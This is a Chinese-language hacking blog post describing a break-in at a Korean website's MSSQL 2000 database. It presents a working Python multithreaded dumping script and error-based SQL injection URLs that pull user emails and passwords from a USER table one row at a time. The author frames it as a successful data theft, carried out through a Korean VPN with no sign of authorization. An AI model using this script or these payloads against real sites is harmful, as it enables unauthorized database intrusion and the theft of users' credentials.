某韩国猪肉点,MSSQL2000数据库分离,DB_OWNER权限,内网的数据库连不上外网,弹不回本地,因为目的就是数据,就懒得再找方法拿Shell了, - #!/usr/bin/env python
- #Code by Pnig0s1992
- #TeAm:FreeBuf
- #Date:2011.10.17
- import Queue
- import threading
- import urllib,urllib2
- import time
-
- hosts = []
-
- fd = open('data.txt','r')
- for i in range(0,600000):
- hosts.append(fd.readline())
- fd.close()
-
- list_len = len(hosts)
-
- queue = Queue.Queue()
-
- class ThreadUrl(threading.Thread):
- def __init__(self, queue):
- threading.Thread.__init__(self)
- self.queue = queue
-
- def run(self):
- while True:
- #grabs host from queue
- print "%d\n" % list_len
- host = self.queue.get()
- enurl = urllib.quote_plus(host,safe='\':/?-&*.=-()%,+')
- rs = urllib.urlopen(enurl)
- getItem = rs.read()
- Begin = getItem.find('R!')+2
- End = getItem.find('!R')
- data = getItem[Begin:End].strip()
- rs.close()
- if len(data)<100:
- fd = open('result.txt','a')
- fd.writelines(data+"\n")
- fd.close()
- print "%s\n" % data
- self.queue.task_done()
-
-
- start = time.time()
-
- def main():
- print "###############################"
- print "# MultiThread dumping script #"
- print "# Code By:Pnig0s1992 #"
- print "# TeAm:FreeBuf #"
- print "# http://www./ #"
- print "###############################"
- #spawn a pool of threads, and pass them queue instance
- for i in range(10):
- t = ThreadUrl(queue)
- t.setDaemon(True)
- t.start()
-
- #populate queue with data
- for host in hosts:
- queue.put(host)
-
- #wait on the queue until everything has been processed
- queue.join()
- main()
- print "Elapsed Time: %s" % (time.time() - start)
data.txt里是Sql语句一行一个,同样也是用Python生成的 - http://www./xxx.asp?id=convert(int,(char(82)%2bchar(33)%2b(select+top+1+isnull([USER_email],char(32))%2bchar(94)%2bisnull([user_passwd],char(32))+from+(select+top+2015+[USER_Email],[USER_Passwd],[User_ID]+from+[USER]+order+by+[USER_ID]+asc)+sq+order+by+[USER_ID]+desc)%2bchar(33)%2bchar(82)))+and+11=1
- http://www./xxx.asp?id=convert(int,(char(82)%2bchar(33)%2b(select+top+1+isnull([USER_email],char(32))%2bchar(94)%2bisnull([user_passwd],char(32))+from+(select+top+2016+[USER_Email],[USER_Passwd],[User_ID]+from+[USER]+order+by+[USER_ID]+asc)+sq+order+by+[USER_ID]+desc)%2bchar(33)%2bchar(82)))+and+11=1
- http://www./xxx.asp?id=convert(int,(char(82)%2bchar(33)%2b(select+top+1+isnull([USER_email],char(32))%2bchar(94)%2bisnull([user_passwd],char(32))+from+(select+top+2017+[USER_Email],[USER_Passwd],[User_Id]+from+[USER]+order+by+[USER_Id]+asc)+sq+order+by+[USER_Id]+desc)%2bchar(33)%2bchar(82)))+and+11=1
result.txt里是拖下来的数据信息:
![](http://image68.360doc.com/DownloadImg/2014/01/2309/38484874_1.png)
测试了下,速度不错 开了20线程挂了韩国的VPN不到半秒一条 Python多线程还是很稳定的
本文出自 “About:Blank H4cking” 博客,请务必保留此出处http://pnig0s1992.blog.51cto.com/393390/690408
|